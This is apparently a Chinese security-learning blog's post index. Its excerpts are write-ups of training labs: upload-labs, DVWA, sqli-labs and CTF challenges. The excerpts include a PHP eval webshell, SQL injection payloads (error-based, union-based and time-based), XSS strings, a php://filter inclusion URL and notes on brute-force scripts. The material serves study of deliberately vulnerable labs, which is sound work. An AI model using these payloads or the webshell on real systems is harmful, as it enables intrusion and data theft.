自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(39)
  • 收藏
  • 关注

原创 大家好,我换博客了 嘻嘻

我的新博客

2019-11-15 09:54:24 156

原创 windows基础

windows2003+IIS+ASP搭建1.在菜单中打开"管理您的服务器",点击"添加或删除角色",进入到下一步开始配置服务器向导2.在配置选项中,将我这次的需求应用程序服务器(IIS,ASP,NET)选择上,随后勾选上所有的工具3.随后在网上找一套asp源码4.将源码放到C:/inetpub/wwwroot中5.在IIS信息管理服务中,右键网站管理,新建一个网站(我取名为test),...

2020-02-18 22:41:09 128 1

原创 攻防世界 write up (loading.....)

攻防世界ics05通过随便一点,发现只有这个页面可以点的通过查看源代码,发现?page=index通过文件包含漏洞php流的http://111.198.29.45:39719/index.php?page=php://filter/convert.base64-encode/resource=index.php通过base64解密得到了一个php源码,并得到关键代码段根...

2019-11-11 23:11:12 290

原创 CTF论剑场(web) write up 未完待续

CTF论剑场(web) write upweb26直接给你一串代码 <?php$num=$_GET['num'];$str=$_GET['str'];show_source(__FILE__);if (isset($num)&&isset($str)) { if (preg_match('/\d+/sD',$str)) { echo "v...

2019-11-09 15:38:23 435

原创 2019-11-8 学习python 遇到函数

2019-11-8 学习python 遇到函数eval() 函数用来执行一个字符串表达式,并返回表达式的值。Python time time() 返回当前时间的时间戳(1970纪元后经过的浮点秒数)。str() 函数将对象转化为适于人阅读的形式。hashlib是涉及安全散列和消息摘要,提供多个不同的加密算法接口,如SHA1、SHA224、SHA256、SHA384、SHA512、MD5等。...

2019-11-08 22:04:43 100

原创 upload pass20

$is_upload = false;$msg = null;if(!empty($_FILES['upload_file'])){ //检查MIME $allow_type = array('image/jpeg','image/png','image/gif'); if(!in_array($_FILES['upload_file']['type'],$allow_...

2019-11-07 17:05:26 340

原创 upload pass-16

#upload-labspass-16在这里必须好好诉诉苦,弄了好久/(ㄒoㄒ)/~~首先上网弄一张.gif的图片,往里面弄一句话木马直接上传,然而发现C刀连接不了,查看源代码。发现有二次渲染在搞鬼,猜测它将我在1.gif最后的一句话给渲染没了,所以我只能将靶机上的图片跟我上传的图片进行对比,看看哪些是渲染前后都没有改变的,然后往1.gif没有改变的区域再加入一句话木马,然后直接上传,最后...

2019-11-07 15:55:12 175

原创 upload-labs pass19

upload -labs pass19$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml"...

2019-11-07 14:17:11 359

原创 upload -labs pass17

#upload -labs pass17#######################unlink() 函数删除文件。若成功,则返回 true,失败则返回 false。语法unlink(filename,context)#######################$is_upload = false;$msg = null;if(isset($_POST['submit']...

2019-11-07 13:06:02 560

原创 upload-labs pass13

#upload-labspass 13function getReailFileType($filename){ $file = fopen($filename, "rb"); $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); $...

2019-11-06 15:33:28 481

原创 upload labs pass11-12(00截断)

#upload-labspass 11$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['uploa...

2019-11-06 13:40:07 526

原创 upload -labs 4-10

upload -labsPass -04$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".htm...

2019-11-06 11:00:50 409

原创 #upload -labs Pass01-03

#upload-labspass-01首先先直接上传hack.php(<?php eval($_POST['READER']);?>),一句话木马试试水结果出错“该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php”盲猜是前端代码所致,所以采用通用做法先上传一句话木马图片hack.jpg然后通过抓包上传成功,后面就用Cknife连接...

2019-11-06 10:08:17 209

原创 File Inclusion漏洞

File Inclusion文件包含漏洞,是指服务器开启allow_url_include=on时,就可以通过php语言的某些特性函数(比如require()、include()等等)利用url去包含文件,此时如果没有对文件来源进行审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞远程文件包含漏洞是由于allow_url_fopen=on(开启时),...

2019-11-04 23:32:21 394

原创 dvwa xss(reflected)

xss(reflected)low<script>alert(''xss)</script>medium过滤不严谨可以采用双写或者大小写混合绕过high虽然无法使用输入<img src=1 onerror=alert(/xss/)>...

2019-11-03 19:10:27 197

原创 dvwa command injection 学习

#dvwa command injection 学习low命令执行漏洞的产生原因一般就是将用户输入未经过滤或者过滤不严就直接当作系统命令进行执行,我们可以通过批处理中的一些技巧来一次执行多条命令,这样就可以执行任意命令。在命令执行中,常用的命令连接符号有四个:&& & || | ;&&:前一个指令执行成功,后面的指令才继续执行,就像进行与操作一样||...

2019-11-02 21:22:45 130

原创 DVWA SECURITY LEVEL HIGH (python3 brute force)

import requestsfrom bs4 import BeautifulSoupdef getToken(url,header): try: r = requests.get(url,headers=header) print ('响应码:',r.status_code) print ('响应包长度:',len(r.text)) r.raise_for_status(...

2019-11-02 19:10:29 178

原创 dvwa-brute force (low........)(采用sql报错注入进行解题)

admin’ and extractvalue(1,concat(’~’,(select user()),’~’))#'~root@localhost~'admin’ and extractvalue(1,concat(’~’,(select database()),’~’))#'~dvwa~'admin’ and extractvalue(1,concat(’~’,(select c...

2019-11-01 22:32:52 271

原创 sqli-labs 靶场知识总结

sqli-labs 靶场知识总结由于我的电脑最近用新系统的时候,还不适应,所以有些通过笔记不见了,/(ㄒoㄒ)/~~我直接写总结吧(有些从注入天书摘抄的,(__) 嘻嘻……)基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注基于如何处理输入的 SQL 查询(数...

2019-11-01 19:15:38 1058

原创 sqli-labs less 54-55

#sqli-labs less54.这一关只能进行十次尝试http://192.168.56.101/sqli-labs-master/Less-54/?id=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=‘challeges’)–+...

2019-11-01 12:18:37 204

原创 sqli-labs less50-53

#sqli-labs less 50-53是order by 和stacked injection 的结合这里以less50为主http://192.168.56.101/sqli-labs-master/Less-50/?sort=1;create table less50 like users

2019-11-01 10:42:07 712

原创 #sqli-labs less46

#sqli-labs less46?sort=1 and (select count() from information_schema.tables group by concat((select concat(table_name)from information_schema.tables where table_schema='security'limit 0,1),floor(rand...

2019-10-31 22:46:49 671

原创 sqli-labs less32

#sqli-labs less 32这关主要是采用宽字节注入Less-32,33,34,35,36,37 六关全部是针对’和\的过滤,所以我们放在一起来进行讨论。对宽字节注入的同学应该对这几关的 bypass 方式应该比较了解。我们在此介绍一下宽字节注入的原理和基本用法。原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii ...

2019-10-30 22:55:59 330 3

原创 HPP注入引入

sqli-labs less 26~28由于windows中的apache解析的问题,我就不具体阐述了(主要是懒)这次我们主要来学习一下HPP注入攻击这是学习HPP的好网站

2019-10-30 20:54:04 197

原创 这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)

import requestsdb_length=1db_url=''db_place=1db_name=''db_ascii=1print("猜解数据库长度")url="http://192.168.56.101/sqli-labs-master/less-5/?id=1'"for db_length in range(1,100): db_url=url+'and %d...

2019-10-29 15:23:59 770 1

原创 sqli-labs less25a

#sqli-labs less25a基于Bool_GET过滤AND/OR数字型_盲注*0x01. 注入方式与回显对比(Review)GETLess 注入方法 正确回显 错误回显1 基于错误注入 查询到的用户名和密码 Mysql错误信息5 双注入 固定字符串 Mysql错误信息7 导出文件注入 固定字符串 另一固定字符...

2019-10-26 15:32:51 228

原创 sqli-labs less 25

#sqli-labs less25有过滤的时候首先要判断这个过滤是一次性的还是非一次性的:若是一次性的,且只是将过滤字符换成了空字符:双写——or=oorr、and=anandd若是非一次性的,就要考虑一些变形:大小写变形——or=Or=oR=OR利用运算符——or=||、and=&&URL编码——#=%23,Hex编码——~=0x7e添加注释——/or/...

2019-10-26 15:07:25 147

原创 sqli-labs less24

#sqli-labs less 24函数回顾mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\’"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。语法mysql_real_escape_string(string,connection)参数 ...

2019-10-26 11:15:21 138

原创 sqli-labs less23

#sqli-labs less 23这一关的与第一关的区别有两个,一个是注释符# --+被过滤了所以我们得闭合第二个单引号另一个区别是不能用order by 来判断字段数了具体原因请参照 https://www.jianshu.com/p/2602430f8ee4’ union select 1,2,3,4 or ‘1’='1’ union select 1,version(),3 o...

2019-10-26 09:47:49 220

原创 sqli-labs less21

#sqli-labs less 19这一关大概与less18差不多,只不过playload得用base64加密') order by 4') union select 1,2,3 #')union select 1,database(),version()#')union select 1,(select group_concat(table_name) from information...

2019-10-26 09:14:07 287

原创 sqli-labs less18

sqli-labs less 18reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1)先用这句话简单的判断后台insert 语句insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...

2019-10-24 14:00:13 389

原创 sqli-labs-less17

#sqli-labs-less17在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项成功报错,说明passwd这一项可以进行注入'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...

2019-10-23 21:40:54 815

原创 sqli-labs-less-15

#sqli-labs-less-15不管用’ " ') ") 都没显错,所以猜测得用时间盲注所以进行尝试admin’ or if(ascii(substr(database(),1,1))=115,1,sleep(5))–+admin’ or if(ascii(substr(database(),2,1))=15,1,sleep(5))–+admin’ or if(left(...

2019-10-18 19:11:29 237

原创 sqli-labs less13

#sqli-labs less13由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。然后我们发现他是’)所以我们继续往下走admin ’ order by n #发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现所以可以判断字段数为2接下来试试adm...

2019-10-18 18:19:37 349

原创 #sqli-labs less 11

#sqli-labs less 11终于到post的阶段了首先试一下常见的弱口令username:admin password:admin结果就成功了。。。算了,‘正规套路’去搞吧顺便练练burp在登陆框中写入 admin 111接下来试试admin’111得到>You have an error in your SQL syntax; check the ...

2019-10-18 16:52:47 168

原创 sqli-labs less -7

##sqli-labs less -7http://localhost/sqli-labs-master/Less-7/?id=1首先老办法判断是数值型的、还是字符型的用and 1=1 和and 1=2 判断并不是数值型的接下来用’ 以及 " 来判断结果判断’ 回显错误 " 回显正常说明是’ 字符型但是用 ’ --+ 发现说明还缺少一些东西猜测用)发现’))–+ 回显...

2019-10-18 16:47:04 393

原创 sqli-labs-less 5之盲注

#盲注相关函数(得好好学python来写脚本不然。。。。。。。)我们进行手工盲注测试,需要用到substr()、length()、ascii()、left()、count()这些sql数据库函数。ascii(a)将a转换成其ASCII值ord(a)将a转换成其ASCII值left(a,b)从左往右截取字符串a的前b个字符substr(a,b,c)从b位置开始,截取字符串a的c长度mid...

2019-10-18 16:28:46 347

原创 #sqli-labs less5

#sqli-labs less5从含义上讲,count(1) 与 count() 都表示对全部数据行的查询。count() 包括了所有的列,相当于行数,在统计结果的时候,不会忽略列值为NULL ;count(1) 用1代表代码行,在统计结果的时候,不会忽略列值为NULL 。一般情况下SQL的报错信息是不会显示在页面中的只有在php.ini 进行如下配置display_errors=On ...

2019-10-18 16:20:53 230

原创 sqli-labs less1(步入网安第一关)

#sqli-labs less1————————————————##重要函数和sql语句使用group_concat() 函数可以让查询获得的数据组成一行显示例子:select group_concat(SCHEMA_NAME) from information_schema.SCHEMATAcount()函数用于统计个数(类似于表的个数,数据库的个数等等)例子:select c...

2019-10-16 20:31:48 510

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除